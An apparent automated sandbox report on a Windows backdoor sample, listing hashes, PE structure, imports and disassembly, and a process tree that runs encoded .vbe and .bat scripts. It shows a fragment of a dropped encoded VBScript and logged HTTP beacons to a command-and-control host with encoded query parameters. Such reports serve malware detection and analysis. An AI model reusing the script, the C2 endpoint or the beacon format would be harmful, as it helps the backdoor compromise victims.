                                              Preview:#@~^wgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vGT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zzNK8+J%{YG:0P8Vr7)L9?2s.\qtb29Pw^PtA 4mOJBPTS,0lsd.eTwAAA==^#~@.
                                              Process:C:\Windows\System32\w32tm.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):151
                                              Entropy (8bit):4.869836745797126
                                              Encrypted:false
                                              SSDEEP:3:VLV993J+miJWEoJ8FXI0xcRQYQyXKvoo/F8aNvj:Vx993DEUT0isyX1ot88
                                              MD5:E9A48FF7D67038BD6762681945A74CED
                                              SHA1:58082C32331202700CF59E28CC73527A0B09ACF6
                                              SHA-256:C20E2B860C21DE8D85EB88D3BFF7E07D0F038568C204229858FCB3FC954C1E09
                                              SHA-512:32BFD16D4D01FF1A73893EBC48C57F135788D95F1700E004489EBCBDA183F45F5E1404E9E22B7810EE067AF3E662EAA807D465463B27D4B4319DCF1B011FED50
                                              Malicious:false
                                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 05/11/2023 15:59:21..15:59:21, error: 0x80072746.15:59:26, error: 0x80072746.
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.27162712266275
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File size:1'378'916 bytes
                                              MD5:5d329190630c5c051e1b2c4ad4c69abd
                                              SHA1:0227d4e1597ca90477cad5fc3a960f3590457031
                                              SHA256:6974f159cb6e056fd9675ec4ecb6d271a7d6bb69711a295be593091d3bcb9e45
                                              SHA512:0b0f745634bbab4234b0b8b9e5f80c9c99870fe0647afcfa88ffe1990012e9968bcf6f722d7f87c54e6cc7ca566e910a605688e7825a9b82629114f67dae69b9
                                              SSDEEP:24576:O2G/nvxW3WDkIavL5BH7pdKk+BSjLeuNVg+4u:ObA3BI+BH9uB+r
                                              TLSH:4B553A037644CC1AD16A1777C4AFC42013ACBD916631CA1A7AAB7A5B75F23931D0AFCB
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                                              Icon Hash:8eb7b38babb6948c
                                              Entrypoint:0x41ec40
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                                              Instruction
                                              call 00007FA700DA99F9h
                                              jmp 00007FA700DA940Dh
                                              cmp ecx, dword ptr [0043E668h]
                                              jne 00007FA700DA9585h
                                              ret
                                              jmp 00007FA700DA9B7Eh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              push esi
                                              push dword ptr [ebp+08h]
                                              mov esi, ecx
                                              call 00007FA700D9C317h
                                              mov dword ptr [esi], 00435580h
                                              mov eax, esi
                                              pop esi
                                              pop ebp
                                              retn 0004h
                                              and dword ptr [ecx+04h], 00000000h
                                              mov eax, ecx
                                              and dword ptr [ecx+08h], 00000000h
                                              mov dword ptr [ecx+04h], 00435588h
                                              mov dword ptr [ecx], 00435580h
                                              ret
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              lea eax, dword ptr [ecx+04h]
                                              mov dword ptr [ecx], 00435568h
                                              push eax
                                              call 00007FA700DAC71Dh
                                              pop ecx
                                              ret
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007FA700D9C2AEh
                                              push 0043B704h
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007FA700DABE32h
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0Ch
                                              lea ecx, dword ptr [ebp-0Ch]
                                              call 00007FA700DA9524h
                                              push 0043B91Ch
                                              lea eax, dword ptr [ebp-0Ch]
                                              push eax
                                              call 00007FA700DABE15h
                                              int3
                                              jmp 00007FA700DADE63h
                                              jmp dword ptr [00433260h]
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push 00421EB0h
                                              push dword ptr fs:[00000000h]
                                              Programming Language:
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [C++] VS2015 UPD3.1 build 24215
                                              • [EXP] VS2015 UPD3.1 build 24215
                                              • [RES] VS2015 UPD3 build 24213
                                              • [LNK] VS2015 UPD3.1 build 24215
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x2abe8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000x2268.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x310ea0x31200False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x330000xa6120xa800False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x3e0000x237280x1000False0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .didat0x620000x1880x200False0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x630000x2abe80x2ac00False0.16787737573099415data4.177203947247443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x8e0000x22680x2400False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              PNG0x635240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                              PNG0x6406c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                              RT_ICON0x656180x262a8Device independent bitmap graphic, 256 x 296 x 32, image size 1515520.10726165498183307
                                              RT_DIALOG0x8b8c00x286dataEnglishUnited States0.5092879256965944
                                              RT_DIALOG0x8bb480x13adataEnglishUnited States0.60828025477707
                                              RT_DIALOG0x8bc840xecdataEnglishUnited States0.6991525423728814
                                              RT_DIALOG0x8bd700x12edataEnglishUnited States0.5927152317880795
                                              RT_DIALOG0x8bea00x338dataEnglishUnited States0.45145631067961167
                                              RT_DIALOG0x8c1d80x252dataEnglishUnited States0.5757575757575758
                                              RT_STRING0x8c42c0x1e2dataEnglishUnited States0.3900414937759336
                                              RT_STRING0x8c6100x1ccdataEnglishUnited States0.4282608695652174
                                              RT_STRING0x8c7dc0x1b8dataEnglishUnited States0.45681818181818185
                                              RT_STRING0x8c9940x146dataEnglishUnited States0.5153374233128835
                                              RT_STRING0x8cadc0x446dataEnglishUnited States0.340036563071298
                                              RT_STRING0x8cf240x166dataEnglishUnited States0.49162011173184356
                                              RT_STRING0x8d08c0x152dataEnglishUnited States0.5059171597633136
                                              RT_STRING0x8d1e00x10adataEnglishUnited States0.49624060150375937
                                              RT_STRING0x8d2ec0xbcdataEnglishUnited States0.6329787234042553
                                              RT_STRING0x8d3a80xd6dataEnglishUnited States0.5747663551401869
                                              RT_GROUP_ICON0x8d4800x14data1.2
                                              RT_MANIFEST0x8d4940x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665
                                              DLLImport
                                              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 5, 2023 14:27:06.249264002 CET4972980192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:27:06.456414938 CET8049729185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:27:06.456778049 CET4972980192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:27:06.457415104 CET4972980192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:27:06.664361954 CET8049729185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:27:06.664421082 CET8049729185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:27:06.686235905 CET4972980192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:27:06.893672943 CET8049729185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:27:06.906579018 CET4972980192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:28:23.299822092 CET4973680192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:28:23.506558895 CET8049736185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:28:23.506655931 CET4973680192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:28:23.507003069 CET4973680192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:28:23.713529110 CET8049736185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:28:23.713598967 CET8049736185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:28:23.718405008 CET4973680192.168.2.4185.26.122.79
                                              Nov 5, 2023 14:28:23.930250883 CET8049736185.26.122.79192.168.2.4
                                              Nov 5, 2023 14:28:23.932092905 CET4973680192.168.2.4185.26.122.79
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 5, 2023 14:27:05.691212893 CET5679953192.168.2.41.1.1.1
                                              Nov 5, 2023 14:27:06.241409063 CET53567991.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 5, 2023 14:27:05.691212893 CET192.168.2.41.1.1.10xf82Standard query (0)host1835875.hostland.proA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 5, 2023 14:27:06.241409063 CET1.1.1.1192.168.2.40xf82No error (0)host1835875.hostland.pro185.26.122.79A (IP address)IN (0x0001)false
                                              • host1835875.hostland.pro
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.449729185.26.122.7980C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 5, 2023 14:27:06.457415104 CET1OUTGET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3
                                              Host: host1835875.hostland.pro
                                              Connection: Keep-Alive
                                              Nov 5, 2023 14:27:06.664421082 CET1INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:27:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                              Nov 5, 2023 14:27:06.686235905 CET2OUTGET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/html
                                              User-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3
                                              Host: host1835875.hostland.pro
                                              Nov 5, 2023 14:27:06.893672943 CET3INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:27:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.449736185.26.122.7980C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 5, 2023 14:28:23.507003069 CET212OUTGET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: host1835875.hostland.pro
                                              Connection: Keep-Alive
                                              Nov 5, 2023 14:28:23.713598967 CET212INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:28:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                              Nov 5, 2023 14:28:23.718405008 CET213OUTGET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/javascript
                                              User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                                              Host: host1835875.hostland.pro
                                              Nov 5, 2023 14:28:23.930250883 CET213INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 05 Nov 2023 13:28:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:14:26:52
                                              Start date:05/11/2023
                                              Path:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              Imagebase:0x7d0000
                                              File size:1'378'916 bytes
                                              MD5 hash:5D329190630C5C051E1B2C4AD4C69ABD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:14:26:53
                                              Start date:05/11/2023
                                              Path:C:\Windows\SysWOW64\wscript.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe"
                                              Imagebase:0xd60000
                                              File size:147'456 bytes
                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:2
                                              Start time:14:27:00
                                              Start date:05/11/2023
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" "
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
